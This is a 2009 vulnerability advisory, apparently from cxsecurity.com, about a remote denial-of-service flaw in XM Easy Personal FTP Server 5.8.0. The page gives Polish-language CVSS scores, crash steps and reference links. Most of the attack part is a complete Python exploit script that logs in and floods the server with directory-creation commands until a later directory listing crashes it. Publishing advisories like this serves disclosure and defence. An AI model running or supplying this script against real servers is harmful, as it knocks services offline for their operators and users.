XM Easy Personal FTP Server 5.8.0 Remote DoS Vulnerability

2009-11-30 / 2009-12-01
Credit: Dxmsoft
Risk: Medium
Local: No
Remote: Yes
CWE: CWE-264


Ogólna skala CVSS: 4/10
Znaczenie: 2.9/10
Łatwość wykorzystania: 8/10
Wymagany dostęp: Zdalny
Złożoność ataku: Niska
Autoryzacja: Jednorazowa
Wpływ na poufność: Brak
Wpływ na integralność: Brak
Wpływ na dostępność: Częściowy

Date of Discovery: 24-Nov-2009 Credits:leinakesi[at]gmail.com Vendor: Dxmsoft ************************************************************************ ******* Affected: XM Easy Personal FTP Server 5.8.0 Earlier versions may also be affected ************************************************************************ ******* Overview: XM Easy Personal FTP Server failed to handle more than 2000 files or folders in the root directory. ************************************************************************ ******* Details: if you could log on the server, take the following steps and the server will crash which lead to DoS. 1.upload 2000 files or folders. 2.close the current connection. 3.use a ftp client to reconnect the server. user ... pass ... port ... list ... crash!!!!!! ************************************************************************ ******* Exploit example: 1.upload 2000 folders. #!/usr/bin/python import socket import sys def Usage(): print ("Usage: ./expl.py <serv_ip> <Username> <password>\n") print ("Example:./expl.py 192.168.48.183 anonymous anonymous\n") if len(sys.argv) <> 4: Usage() sys.exit(1) else: hostname=sys.argv[1] username=sys.argv[2] passwd=sys.argv[3] test_string='a' sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) try: sock.connect((hostname, 21)) except: print ("Connection error!") sys.exit(1) r=sock.recv(1024) sock.send("user %s\r\n" %username) r=sock.recv(1024) sock.send("pass %s\r\n" %passwd) for i in range(1,200): sock.send("mkd " + "a" * i +"\r\n") print "[-] " + ("mkd " + "a" * i +"\r\n") r=sock.recv(1024) print "[+] " + r + "\r\n" for i in range(1,200): sock.send("mkd " + "b" * i +"\r\n") print "[-] " + ("mkd " + "b" * i +"\r\n") r=sock.recv(1024) print "[+] " + r + "\r\n" for i in range(1,200): sock.send("mkd " + "c" * i +"\r\n") print "[-] " + ("mkd " + "c" * i +"\r\n") r=sock.recv(1024) print "[+] " + r + "\r\n" for i in range(1,200): sock.send("mkd " + "d" * i +"\r\n") print "[-] " + ("mkd " + "d" * i +"\r\n") r=sock.recv(1024) print "[+] " + r + "\r\n" for i in range(1,200): sock.send("mkd " + "e" * i +"\r\n") print "[-] " + ("mkd " + "e" * i +"\r\n") r=sock.recv(1024) print "[+] " + r + "\r\n" for i in range(1,200): sock.send("mkd " + "f" * i +"\r\n") print "[-] " + ("mkd " + "f" * i +"\r\n") r=sock.recv(1024) print "[+] " + r + "\r\n" for i in range(1,200): sock.send("mkd " + "g" * i +"\r\n") print "[-] " + ("mkd " + "g" * i +"\r\n") r=sock.recv(1024) print "[+] " + r + "\r\n" for i in range(1,200): sock.send("mkd " + "h" * i +"\r\n") print "[-] " + ("mkd " + "h" * i +"\r\n") r=sock.recv(1024) print "[+] " + r + "\r\n" for i in range(1,200): sock.send("mkd " + "i" * i +"\r\n") print "[-] " + ("mkd " + "i" * i +"\r\n") r=sock.recv(1024) print "[+] " + r + "\r\n" for i in range(1,200): sock.send("mkd " + "j" * i +"\r\n") print "[-] " + ("mkd " + "j" * i +"\r\n") r=sock.recv(1024) print "[+] " + r + "\r\n" sock.close() sys.exit(0); 2.use a ftp client to reconnect the server for example: start->run->cmd->ftp 127.0.0.1->*****->*****->dir

Referencje:

http://xforce.iss.net/xforce/xfdb/54400
http://www.securityfocus.com/bid/37112
http://www.securityfocus.com/archive/1/archive/1/508049/100/0/threaded
http://secunia.com/advisories/37473


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top